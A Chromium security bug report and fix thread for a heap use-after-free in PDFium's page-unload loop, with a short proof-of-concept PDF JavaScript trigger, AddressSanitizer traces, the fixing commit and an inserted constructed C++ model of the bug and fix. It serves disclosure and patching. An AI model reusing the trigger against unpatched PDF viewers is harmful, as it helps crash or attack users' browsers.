Status: Fixed
Closed: Nov 9
OS: Linux , Windows , iOS , Chrome , Mac
Pri: 1
Type: Bug-Security
Heap-use-after-free in PDFiumEngine::HandleEvent
Reported by chamal.d...@gmail.com, Nov 1
VULNERABILITY DETAILS
The bug is in the code below, in the PDFiumEngine::HandleEvent method of pdfium_engine.cc.

for (int page_index : deferred_page_unloads_)
  pages_[page_index]->Unload();

It is possible to fire a "Lost Focus" event of a form field through pages_[page_index]->Unload().
It is possible to add another item to the "deferred_page_unloads_" vector through the "Lost Focus" event.
This will invalidate the iterator of the above for loop.

The test.pdf file contains the JavaScript below.
Document JavaScript section
---------------------------
function test() {
  this.getField('txt2').setFocus();
  this.getField('txt3').setFocus();
  this.getField('txt2').setFocus();
}
app.setTimeOut('test()', 1000);

Lost Focus event of the "txt2" text field
-----------------------------------------
m = this.pageNum;

VERSION
Chrome Version: [62.0.3202.62] + [stable]
                [64.0.3256.0] + [Trunk build]
Operating System: [Ubuntu 16.04]
                  * On a Windows release build this does not crash.
                    On a Windows debug build the PDF process crashes with an assert failure.

REPRODUCTION CASE
1. Open the test.pdf file with Chrome.
2. Wait 1 second.
3. Move mouse over PDF document.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [PDF process]
Crash State: [Address Sanitizer output]
==1==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000013374 at pc 0x55688ff94618 bp 0x7ffdedfdff90 sp 0x7ffdedfdff88
READ of size 4 at 0x602000013374 thread T0 (chrome)
    #0 0x55688ff94617 in chrome_pdf::PDFiumEngine::HandleEvent(pp::InputEvent const&) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:1402:23
    #1 0x55688ff6172d in chrome_pdf::OutOfProcessInstance::HandleInputEvent(pp::InputEvent const&) /home/chamal/chromium/src/out/asan/../../pdf/out_of_process_instance.cc:717:16
    #2 0x55688132c322 in pp::InputEvent_HandleEvent(int, int) /home/chamal/chromium/src/out/asan/../../ppapi/cpp/module.cc:53:32
    #3 0x55688d7275be in CallWhileUnlocked<PP_Bool, int, int, int, int> /home/chamal/chromium/src/out/asan/../../ppapi/shared_impl/proxy_lock.h:135:10
    #4 0x55688d7275be in ppapi::proxy::PPP_InputEvent_Proxy::OnMsgHandleFilteredInputEvent(int, ppapi::InputEventData const&, PP_Bool*) /home/chamal/chromium/src/out/asan/../../ppapi/proxy/ppp_input_event_proxy.cc:107:0
    #5 0x55688d7270b4 in DispatchToMethodImpl<ppapi::proxy::PPP_InputEvent_Proxy *, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, const ppapi::InputEventData &, PP_Bool *), std::__1::tuple<int, ppapi::InputEventData>, std::__1::tuple<PP_Bool>, 0, 1, 0> /home/chamal/chromium/src/out/asan/../../base/tuple.h:94:3
    #6 0x55688d7270b4 in DispatchToMethod<ppapi::proxy::PPP_InputEvent_Proxy *, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, const ppapi::InputEventData &, PP_Bool *), std::__1::tuple<int, ppapi::InputEventData>, std::__1::tuple<PP_Bool> > /home/chamal/chromium/src/out/asan/../../base/tuple.h:105:0
    #7 0x55688d7270b4 in bool IPC::MessageT<PpapiMsg_PPPInputEvent_HandleFilteredInputEvent_Meta, std::__1::tuple<int, ppapi::InputEventData>, std::__1::tuple<PP_Bool> >::Dispatch<ppapi::proxy::PPP_InputEvent_Proxy, ppapi::proxy::PPP_InputEvent_Proxy, void, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, ppapi::InputEventData const&, PP_Bool*)>(IPC::Message const*, ppapi::proxy::PPP_InputEvent_Proxy*, ppapi::proxy::PPP_InputEvent_Proxy*, void*, void (ppapi::proxy::PPP_InputEvent_Proxy::*)(int, ppapi::InputEventData const&, PP_Bool*)) /home/chamal/chromium/src/out/asan/../../ipc/ipc_message_templates.h:204:0
    #8 0x55688d7266ee in ppapi::proxy::PPP_InputEvent_Proxy::OnMessageReceived(IPC::Message const&) /home/chamal/chromium/src/out/asan/../../ppapi/proxy/ppp_input_event_proxy.cc:85:5
    #9 0x55688d693de2 in ppapi::proxy::PluginDispatcher::OnMessageReceived(IPC::Message const&) /home/chamal/chromium/src/out/asan/../../ppapi/proxy/plugin_dispatcher.cc:273:22
    #10 0x556884279dda in IPC::ChannelProxy::Context::OnDispatchMessage(IPC::Message const&) /home/chamal/chromium/src/out/asan/../../ipc/ipc_channel_proxy.cc:320:14
    #11 0x556881f9a127 in Run /home/chamal/chromium/src/out/asan/../../base/callback.h:64:12
    #12 0x556881f9a127 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) /home/chamal/chromium/src/out/asan/../../base/debug/task_annotator.cc:57:0
    #13 0x556881ffd09a in base::MessageLoop::RunTask(base::PendingTask*) /home/chamal/chromium/src/out/asan/../../base/message_loop/message_loop.cc:394:25
    #14 0x556881ffe4ad in DeferOrRunPendingTask /home/chamal/chromium/src/out/asan/../../base/message_loop/message_loop.cc:406:5
    #15 0x556881ffe4ad in base::MessageLoop::DoWork() /home/chamal/chromium/src/out/asan/../../base/message_loop/message_loop.cc:450:0
    #16 0x556882005eb9 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /home/chamal/chromium/src/out/asan/../../base/message_loop/message_pump_default.cc:37:31
    #17 0x55688207d0b1 in base::RunLoop::Run() /home/chamal/chromium/src/out/asan/../../base/run_loop.cc:114:14
    #18 0x5568812bc01d in content::PpapiPluginMain(content::MainFunctionParams const&) /home/chamal/chromium/src/out/asan/../../content/ppapi_plugin/ppapi_plugin_main.cc:160:19
    #19 0x5568815845d3 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) /home/chamal/chromium/src/out/asan/../../content/app/content_main_runner.cc:356:14
    #20 0x5568815877d7 in content::ContentMainRunnerImpl::Run() /home/chamal/chromium/src/out/asan/../../content/app/content_main_runner.cc:705:12
    #21 0x5568815ab641 in service_manager::Main(service_manager::MainParams const&) /home/chamal/chromium/src/out/asan/../../services/service_manager/embedder/main.cc:456:29
    #22 0x556881583e10 in content::ContentMain(content::ContentMainParams const&) /home/chamal/chromium/src/out/asan/../../content/app/content_main.cc:19:10
    #23 0x55687bf66c6f in ChromeMain /home/chamal/chromium/src/out/asan/../../chrome/app/chrome_main.cc:123:12
    #24 0x7fa11f04f82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291:0

0x602000013374 is located 4 bytes inside of 8-byte region [0x602000013370,0x602000013378)
freed by thread T0 (chrome) here:
    #0 0x55687bf64862 in operator delete(void*) ??:0:0
    #1 0x55687c21fe03 in __libcpp_deallocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:234:3
    #2 0x55687c21fe03 in deallocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1789:0
    #3 0x55687c21fe03 in deallocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1549:0
    #4 0x55687c21fe03 in ~__split_buffer /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__split_buffer:341:0
    #5 0x55687c21fe03 in void std::__1::vector<int, std::__1::allocator<int> >::__push_back_slow_path<int>(int&&) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1577:0
    #6 0x55688ff8a3b8 in push_back /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1613:9
    #7 0x55688ff8a3b8 in chrome_pdf::PDFiumEngine::CalculateVisiblePages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:3114:0
    #8 0x55688ffa9d9d in chrome_pdf::PDFiumEngine::GetMostVisiblePage() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2705:3
    #9 0x55688ff866e4 in chrome_pdf::PDFiumEngine::Form_GetCurrentPage(_FPDF_FORMFILLINFO*, void*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:4061:21
    #10 0x55689001f4ca in GetCurrentPage /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:295:12
    #11 0x55689001f4ca in CPDFSDK_FormFillEnvironment::GetCurrentView() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:568:0
    #12 0x5568904e0abd in Document::get_page_num(CJS_Runtime*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:185:49
    #13 0x5568904f5de0 in void JSPropGetter<Document, &Document::get_page_num>(char const*, char const*, v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/JS_Define.h:78:23
    #14 0x55688027eeee in v8::internal::PropertyCallbackArguments::Call(void (*)(v8::Local<v8::Name>, v8::PropertyCallbackInfo<v8::Value> const&), v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/api-arguments-inl.h:44:1
    #15 0x556880431ac8 in v8::internal::Object::GetPropertyWithAccessor(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1617:34
    #16 0x55688042f617 in v8::internal::Object::GetProperty(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1132:16
    #17 0x55688024d402 in v8::internal::LoadIC::Load(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:452:5
    #18 0x556880265683 in __RT_impl_Runtime_LoadIC_Miss /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2050:5
    #19 0x556880265683 in v8::internal::Runtime_LoadIC_Miss(int, v8::internal::Object**, v8::internal::Isolate*) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2033:0
    #13 0x7fa0e9e8469c  (<unknown module>)
    #14 0x7fa0e9ee4995  (<unknown module>)
    #15 0x7fa0e9e92a07  (<unknown module>)
    #16 0x7fa0e9e903f7  (<unknown module>)
    #17 0x7fa0e9e840fe  (<unknown module>)
    #20 0x55688001bf4f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:142:13
    #21 0x55688001b923 in CallInternal /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:178:10
    #22 0x55688001b923 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:188:0
    #23 0x55687f6ed670 in v8::Script::Run(v8::Local<v8::Context>) /home/chamal/chromium/src/out/asan/../../v8/src/api.cc:2090:7
    #24 0x55689059f4c3 in CFXJS_Engine::Execute(fxcrt::WideString const&, FXJSErr*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/fxjs_v8.cpp:476:25
    #25 0x5568904d452f in CJS_Runtime::ExecuteScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_runtime.cpp:209:14
    #26 0x556890567c5d in CJS_EventContext::RunScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_event_context.cpp:53:24
    #27 0x55689002f1a1 in CPDFSDK_ActionHandler::RunFieldJavaScript(CPDFSDK_FormFillEnvironment*, CPDF_FormField*, CPDF_AAction::AActionType, PDFSDK_FieldAction&, fxcrt::WideString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:513:25
    #28 0x5568900303dd in CPDFSDK_ActionHandler::ExecuteFieldAction(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&, std::__1::set<CPDF_Dictionary*, std::__1::less<CPDF_Dictionary*>, std::__1::allocator<CPDF_Dictionary*> >*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:249:9
    #29 0x55689002fed6 in CPDFSDK_ActionHandler::DoAction_Field(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:111:10
    #30 0x55689000ff34 in CPDFSDK_Widget::OnAAction(CPDF_AAction::AActionType, PDFSDK_FieldAction&, CPDFSDK_PageView*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_widget.cpp:1009:28
    #31 0x556890064660 in CFFL_InteractiveFormFiller::OnKillFocus(fxcrt::Observable<CPDFSDK_Annot>::ObservedPtr*, unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/formfiller/cffl_interactiveformfiller.cpp:443:12
    #32 0x55689001ea24 in CPDFSDK_FormFillEnvironment::KillFocusAnnot(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:714:23

previously allocated by thread T0 (chrome) here:
    #0 0x55687bf63c42 in operator new(unsigned long) ??:0:0
    #1 0x55687c21fcce in __allocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:226:10
    #2 0x55687c21fcce in allocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1786:0
    #3 0x55687c21fcce in allocate /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1541:0
    #4 0x55687c21fcce in __split_buffer /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__split_buffer:309:0
    #5 0x55687c21fcce in void std::__1::vector<int, std::__1::allocator<int> >::__push_back_slow_path<int>(int&&) /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1572:0
    #6 0x55688ff8a3b8 in push_back /home/chamal/chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/vector:1613:9
    #7 0x55688ff8a3b8 in chrome_pdf::PDFiumEngine::CalculateVisiblePages() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:3114:0
    #8 0x55688ffa9d9d in chrome_pdf::PDFiumEngine::GetMostVisiblePage() /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2705:3
    #9 0x55688ff866e4 in chrome_pdf::PDFiumEngine::Form_GetCurrentPage(_FPDF_FORMFILLINFO*, void*) /home/chamal/chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:4061:21
    #10 0x55689001f4ca in GetCurrentPage /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:295:12
    #11 0x55689001f4ca in CPDFSDK_FormFillEnvironment::GetCurrentView() /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:568:0
    #12 0x5568904e0abd in Document::get_page_num(CJS_Runtime*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:185:49
    #13 0x5568904f5de0 in void JSPropGetter<Document, &Document::get_page_num>(char const*, char const*, v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/JS_Define.h:78:23
    #14 0x55688027eeee in v8::internal::PropertyCallbackArguments::Call(void (*)(v8::Local<v8::Name>, v8::PropertyCallbackInfo<v8::Value> const&), v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/api-arguments-inl.h:44:1
    #15 0x556880431ac8 in v8::internal::Object::GetPropertyWithAccessor(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1617:34
    #16 0x55688042f617 in v8::internal::Object::GetProperty(v8::internal::LookupIterator*) /home/chamal/chromium/src/out/asan/../../v8/src/objects.cc:1132:16
    #17 0x55688024d402 in v8::internal::LoadIC::Load(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Name>) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:452:5
    #18 0x556880265683 in __RT_impl_Runtime_LoadIC_Miss /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2050:5
    #19 0x556880265683 in v8::internal::Runtime_LoadIC_Miss(int, v8::internal::Object**, v8::internal::Isolate*) /home/chamal/chromium/src/out/asan/../../v8/src/ic/ic.cc:2033:0
    #13 0x7fa0e9e8469c  (<unknown module>)
    #14 0x7fa0e9ee4995  (<unknown module>)
    #15 0x7fa0e9e92a07  (<unknown module>)
    #16 0x7fa0e9e903f7  (<unknown module>)
    #17 0x7fa0e9e840fe  (<unknown module>)
    #20 0x55688001bf4f in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:142:13
    #21 0x55688001b923 in CallInternal /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:178:10
    #22 0x55688001b923 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /home/chamal/chromium/src/out/asan/../../v8/src/execution.cc:188:0
    #23 0x55687f6ed670 in v8::Script::Run(v8::Local<v8::Context>) /home/chamal/chromium/src/out/asan/../../v8/src/api.cc:2090:7
    #24 0x55689059f4c3 in CFXJS_Engine::Execute(fxcrt::WideString const&, FXJSErr*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/fxjs_v8.cpp:476:25
    #25 0x5568904d452f in CJS_Runtime::ExecuteScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_runtime.cpp:209:14
    #26 0x556890567c5d in CJS_EventContext::RunScript(fxcrt::WideString const&, fxcrt::WideString*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_event_context.cpp:53:24
    #27 0x55689002f1a1 in CPDFSDK_ActionHandler::RunFieldJavaScript(CPDFSDK_FormFillEnvironment*, CPDF_FormField*, CPDF_AAction::AActionType, PDFSDK_FieldAction&, fxcrt::WideString const&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:513:25
    #28 0x5568900303dd in CPDFSDK_ActionHandler::ExecuteFieldAction(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&, std::__1::set<CPDF_Dictionary*, std::__1::less<CPDF_Dictionary*>, std::__1::allocator<CPDF_Dictionary*> >*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:249:9
    #29 0x55689002fed6 in CPDFSDK_ActionHandler::DoAction_Field(CPDF_Action const&, CPDF_AAction::AActionType, CPDFSDK_FormFillEnvironment*, CPDF_FormField*, PDFSDK_FieldAction&) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fsdk_actionhandler.cpp:111:10
    #30 0x55689000ff34 in CPDFSDK_Widget::OnAAction(CPDF_AAction::AActionType, PDFSDK_FieldAction&, CPDFSDK_PageView*) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_widget.cpp:1009:28
    #31 0x556890064660 in CFFL_InteractiveFormFiller::OnKillFocus(fxcrt::Observable<CPDFSDK_Annot>::ObservedPtr*, unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/formfiller/cffl_interactiveformfiller.cpp:443:12
    #32 0x55689001ea24 in CPDFSDK_FormFillEnvironment::KillFocusAnnot(unsigned int) /home/chamal/chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_formfillenvironment.cpp:714:23

Attachment: test.pdf (2.9 KB)
Also see https://codereview.chromium.org/2418533002 for bug 653090.
That fix indirectly helps to cause this bug.
Cc: rharrison@chromium.org
Components: Internals>Plugins>PDF
Labels: Security_Severity-High Security_Impact-Stable OS-Linux Pri-1
Owner: dsinclair@chromium.org
Status: Assigned
+dsinclair: can you look at this please?
Cc: tsepez@chromium.org
Labels: M-64 OS-Chrome OS-Mac OS-Windows
Status: Started
Project Member Comment 5 by bugdroid1@chromium.org, Nov 9
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/01c9a7e71ca435651723e8cbcab0b3ad4c5351e2

commit 01c9a7e71ca435651723e8cbcab0b3ad4c5351e2
Author: Dan Sinclair <dsinclair@chromium.org>
Date: Thu Nov 09 01:56:02 2017

[pdf] Use a temporary list when unloading pages

When traversing the |deferred_page_unloads_| list and handling the
unloads it's possible for new pages to get added to the list which will
invalidate the iterator.

This CL swaps the list with an empty list and does the iteration on the
list copy. New items that are unloaded while handling the defers will be
unloaded at a later point.

Bug: 780450
Change-Id: Ic7ced1c82227109784fb536ce19a4dd51b9119ac
Reviewed-on: https://chromium-review.googlesource.com/758916
Commit-Queue: dsinclair <dsinclair@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>
Cr-Commit-Position: refs/heads/master@{#515056}
[modify] https://crrev.com/01c9a7e71ca435651723e8cbcab0b3ad4c5351e2/pdf/pdfium/pdfium_engine.cc

Status: Fixed
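A constructed model of the hazard the report describes and of the fix the commit above applies (added example, not Chromium or PDFium code; the Page and Engine classes, the Lost Focus callback hook and the page indices are assumptions). The pre-fix loop is kept in a form that reports the mid-loop mutation instead of dereferencing freed memory, next to the swap-to-a-local form from the commit.

```cpp
#include <cstddef>
#include <functional>
#include <utility>
#include <vector>

class Engine;

// Stand-in for a PDFium page (constructed model, not pdfium code): unloading it
// may run the form field's "Lost Focus" script, which can call back into the engine.
class Page {
 public:
  void SetOnLostFocus(std::function<void(Engine&)> cb) { on_lost_focus_ = std::move(cb); }
  void Unload(Engine& engine);
  bool loaded() const { return loaded_; }
 private:
  bool loaded_ = true;
  std::function<void(Engine&)> on_lost_focus_;
};

class Engine {
 public:
  explicit Engine(int page_count) : pages_(page_count) {}
  Page& page(int i) { return pages_[i]; }
  void DeferUnload(int page_index) { deferred_page_unloads_.push_back(page_index); }
  const std::vector<int>& deferred() const { return deferred_page_unloads_; }

  // Pre-fix shape: walks the live vector while Unload() may append to it. Indexed
  // here so it stays defined; returns true when the list grew mid-loop, which is
  // exactly the point at which the original range-for's iterator went stale.
  bool HandleEventPreFix() {
    const std::size_t size_before = deferred_page_unloads_.size();
    for (std::size_t i = 0; i < deferred_page_unloads_.size(); ++i) {
      pages_[deferred_page_unloads_[i]].Unload(*this);
      if (deferred_page_unloads_.size() != size_before) return true;
    }
    deferred_page_unloads_.clear();
    return false;
  }

  // Fixed shape, as the commit describes: move the list into a local and iterate
  // that; anything deferred by a callback waits for the next event.
  void HandleEvent() {
    std::vector<int> pending;
    pending.swap(deferred_page_unloads_);
    for (int page_index : pending) pages_[page_index].Unload(*this);
  }

 private:
  std::vector<Page> pages_;
  std::vector<int> deferred_page_unloads_;
};

void Page::Unload(Engine& engine) {
  loaded_ = false;
  if (on_lost_focus_) on_lost_focus_(engine);  // the script runs inside Unload()
}

// The report's scenario (constructed): page 2 is already queued for unloading, and
// unloading it fires a Lost Focus script that defers page 3.
Engine MakeScenario() {
  Engine engine(4);
  engine.page(2).SetOnLostFocus([](Engine& e) { e.DeferUnload(3); });
  engine.DeferUnload(2);
  return engine;
}
```

With the fixed handler, page 3 stays queued after the first event and is unloaded on the next one; the pre-fix loop reports the list growing underneath it on the very first unload.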
Project Member Comment 7 by sheriffbot@chromium.org, Nov 9
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************
Nice one! The VRP panel decided to award $3,000 for this report!
Labels: -reward-unpaid reward-inprocess
Project Member Comment 12 by sheriffbot@chromium.org, Dec 15
Labels: Merge-Request-64
Project Member Comment 13 by sheriffbot@chromium.org, Dec 15
Labels: -Merge-Request-64 Hotlist-Merge-Review Merge-Review-64
This bug requires manual review: M64 has already been promoted to the beta branch, so this requires manual review
Please contact the milestone owner if you have questions.
Owners: cmasso@(Android), cmasso@(iOS), kbleicher@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -Hotlist-Merge-Review -Merge-Review-64 OS-iOS
Fix is already in 64
Labels: Release-0-M64
Labels: CVE-2018-6031
Project Member Comment 17 by sheriffbot@chromium.org, Feb 15
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot